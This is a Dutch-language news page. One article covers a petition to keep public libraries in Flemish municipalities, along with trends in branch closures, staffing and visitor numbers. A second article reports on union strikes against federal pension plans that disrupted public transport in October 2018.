Minder bibliotheekfilialen en leners, wel meer bezoekers: petitie vraagt blijvende aandacht voor de bib
Een bibliotheek in je gemeente, dat is een basisrecht, ook na de gemeenteraadsverkiezingen. Dat staat in een petitie met 56.000 handtekeningen, die vanmorgen is overhandigd aan Vlaams Parlementsvoorzitter Jan Peumans. Uit een rondvraag van VRT NWS blijkt dat de laatste jaren het aantal filialen is gedaald. Veel bibliotheken zijn aan het "vervellen" tot kenniscentra, met steeds meer bezoekers en minder leners.

Het goede nieuws: in nagenoeg elk van de 308 Vlaamse en 19 Brusselse gemeenten is er nog altijd een openbare bibliotheek. De initiatiefnemers van “Bib voor iedereen” (bibliotheken en partners als Davidsfonds of Gezinsbond) willen dat dan ook na de gemeenteraadsverkiezingen zo blijft. 56.000 mensen hebben de petitie ondertekend, en 223 gemeentebesturen hebben een charter ondertekend waarin ze beloven om de bib te behouden.

De petitie is vanochtend overhandigd aan Jan Peumans (N-VA), voorzitter van het Vlaams Parlement.

De bibliotheken maken zich zorgen. In 2016 is er namelijk een en ander veranderd in hun financiering. Traditiegetrouw krijgen ze zowat tweederde van hun centen van de stad of de gemeente, en één derde van de Vlaamse overheid.

Sinds 2016 worden de subsidies van de Vlaamse Gemeenschap voor de bibliotheken (ruim 50 miljoen euro per jaar) in het algemene Gemeentefonds gestort, zonder dat ze “gelabeld” of “geoormerkt” zijn voor de bibliotheken. Een stad of een gemeente kan dat geld met andere woorden ook voor pakweg sociale huisvesting gebruiken. Een bib is niet langer verplicht.

We maken ons zorgen over enkele gemeenten, waar er intern discussie is over al dan niet een bib

In de aflopende bestuursperiode zijn er geen bibliotheken gesloten. Maar de sector vreest dat dat wel eens zou kunnen gebeuren vanaf 2019, vooral dan in kleinere gemeenten.

Mindere - maar soms betere - vestigingen, minder personeel, fluctuerend budget

Nu al is er een trend om filialen van bibliotheken te sluiten. Dat is bijvoorbeeld gebeurd in Roeselare, Heist-op-den-Berg of Dendermonde. In de plaats komt soms wel een fonkelnieuwe centrale bibliotheek met alles erop en eraan, tot een leescafé toe, zoals het kenniscentrum ARhus in Roeselare, de Krook in Gent, Muntpunt in Brussel, de bibs van Lummen, Tremelo of Dendermonde (waar nog wel allerlei bouwtechnische gebreken aan zijn) of de toekomstige bib van Mechelen Het Predikheren (opening gepland in 2019). "Er wordt gelukkig toch nog wel geïnvesteerd in bibliotheken," zegt Bruno Vermeeren.

Opvallend is ook dat het aantal personeelsleden van de bibliotheken daalt, met zo'n tien procent de afgelopen tien jaar. Vaak worden gepensioneerden niet vervangen. Al wie een bib binnenloopt, merkt dat ontleningen en betalingen bijvoorbeeld vaker geautomatiseerd gebeuren. Enerzijds een modernisering, anderzijds wel minder persoonlijk contact en advies aan de bib-gebruiker. "Zonder degelijk opgeleid personeel heb je geen goede bibliotheekwerking," vindt Bruno Vermeeren.

Wat de werkingsmiddelen betreft rapporteerden de bibliotheken vaak een daling, zeker in het begin van de afgelopen bestuursperiode. In 2018 waren er weer meer bibs die hun middelen zagen toe- dan afnemen. “Een stabilisatie, maar op een lager niveau dan voor de crisis,” zegt Bruno Vermeeren van de VVBAD, de koepelorganisatie van de openbare bibs in Vlaanderen en Brussel.

Minder ontleners, meer bezoekers

De laatste officiële cijfers voor heel Vlaanderen dateren van 2015: toen waren er 19.363.510 bezoekers en 1.450.266 leners. Eén op de vijf inwoners van een stad leende in dat jaar een boek of dvd. 59% van de leners was een vrouw. Afhankelijk van de provincie was tussen 30 en 39% een jonge lener.

Heel opvallend: de gebruikers van de bib zijn in toenemende mate bezoekers voor de activiteiten (lezingen, voorleessessies, opleidingen…) en in afnemende mate leners van boeken of dvd’s. Het aantal leners daalde tussen 2008 en 2015 met zo'n 10%.

Mensen komen naar de bib om andere redenen dan het ontlenen van boeken of dvd's

Er zijn steeds meer activiteiten zoals voorleessessies, boekvoorstellingen, interviews maar ook cursussen en tentoonstellingen. Of je gaat naar de bib om je krantje te lezen, wie weet met een kop koffie erbij.

"Kenniscentra"

Veel bibliotheken spelen daarop in en herdopen zichzelf tot “een inspiratieplek voor kennis, cultuur en innovatie” (De Krook in Gent), een “open kenniscentrum” (ARhus Roeselare) of een “makerbib” (Bree). “We willen verhalen blijven aanbieden, in boek- of andere vorm, maar voor de kennisoverdracht zetten we in op workshops, over mediawijsheid, 3D-printing ... ” zegt bibliothecaris Annemie Arras.

Bree komt binnenkort met een primeur voor ons land: de bibliotheek zal open zijn tussen 10 en 22 uur, waarvan maar 30 uur per week mét personeel. Buiten de bemande openingsuren zal iedereen met een e-ID en een persoonlijke code boeken of andere bib-materialen kunnen kiezen. “Niet uit besparingsoverwegingen,” benadrukt Annemie Arras. “In Bree zijn zowel werkingsmiddelen als personeel redelijk stabiel gebleven.” Maar ze deelt wel de vrees voor andere bibliotheken in Vlaanderen.

"Vroeger was de bib de enige plek waar je informatie kon vinden, nu is de concurrentie veel groter. Bibs willen nu vooral mensen helpen om de juiste competenties te vinden, om te kunnen werken met tablets en smartphones, maar ook om kwaliteitsvolle informatie te kunnen scheiden van fake news, en om nieuwe dingen en culturen te leren kennen”, zegt Bruno Vermeeren van de VVBAD.

lees artikel op www.vrt.be

Reacties uitgeschakeld voor Protest tegen de pensioenplannen van de federale regering

Protest tegen de pensioenplannen van de federale regering

Door | 2 oktober 2018 | Nieuws

Vakbonden leggen Brusselse metro grotendeels plat

Bron: De Tijd, 2/10/2018

Door vakbondsacties dinsdagochtend is er slechts op één Brusselse metrolijn verkeer. Ook in Antwerpen, Gent en Vlaams-Brabant is er hinder bij het openbaar vervoer.
Protest tegen de plannen van de federale regering om de pensioenen betaalbaar te maken, leidt dinsdagmorgen tot grote hinder in Brussel, Antwerpen en Gent. De treinen rijden wel. De ochtendspits op de autosnelwegen verloopt vrij druk, meldt het Vlaams Verkeerscentrum.
De meeste hinder is er in Vlaams-Brabant en op de stadsnetten van Antwerpen en Gent. Maar ook daarbuiten vallen er ritten weg. In de hele provincie Antwerpen is de dienstverlening zwaar verstoord, meldt De Lijn.
Op het stadsnet van Antwerpen was om 7.30 uur een kwart van de stadsbussen en de helft van de trams uitgereden. Op de lijnen van Antwerpen naar het noorden van de provincie en in de regio Mechelen is driekwart van de chauffeurs aan de slag. In de regio Turnhout is dat ongeveer twee derde, klinkt het.
Ook in Gent is het stadsnet zwaar verstoord. Tramlijn 1 en de stadsbussen 3 en 5 rijden om het kwartier. Bij tramlijnen 2 en 4 en de stadsbus 9 is dat om het halfuur. Andere stadsbussen rijden niet. Na 20 uur rijden er geen stadslijnen meer. In Aalst wordt bijna de helft van de stadslijnen gereden.
Kusttram

In Vlaams-Brabant is er in heel de provincie hinder. De dienstverlening is het meest verstoord in de grote rand rond Brussel, vooral in het Pajottenland en de Druivenstreek. Ook het stadsnet van Leuven ondervindt grote hinder. In Limburg zijn zeven op de tien chauffeurs uitgereden. De hinder is voelbaar op de streeklijnen in de hele provincie. Ook op de stadslijnen van Hasselt, Genk, Tongeren en Sint-Truiden rijden beduidend minder bussen. Bij de belbussen kunnen niet alle gereserveerde ritten gereden worden.
In West-Vlaanderen tot slot rijdt 90 procent van de chauffeurs. Bij de kusttram is de hinder groter, met drie trams op de vier die rijden. Op het stadsnet van Oostende rijdt 60 procent van de bussen.
In Brussel was dinsdag om 6 uur slechts één metrolijn actief: lijn 1. Tussen Simonis en De Brouckère zijn bussen ingelegd. Heel wat bussen en trams op andere lijnen rijden niet.
In Brussel is een manifestatie gepland vanaf 10 uur op het Albertinaplein, net als een omsluiting van het parlement door een menselijke ketting. Een vakbondsdelegatie zal premier Charles Michel (MR) en Kamervoorzitter Siegfried Bracke (N-VA) ontmoeten. De bonden verwachten meer dan 10.000 manifestanten in Brussel.
In Antwerpen start een manifestatie om 10.30 uur aan de Leopold De Waelplaats, in Leuven om 10 uur aan het Martelarenplein, in Hasselt om 10.30 uur aan het station, in Gent om 11 uur aan de Federale Pensioendienst in de Koningin Fabiolalaan en in Kortrijk om 11 uur aan de Federale Pensioendienst in de Keer der Vlamingenstraat.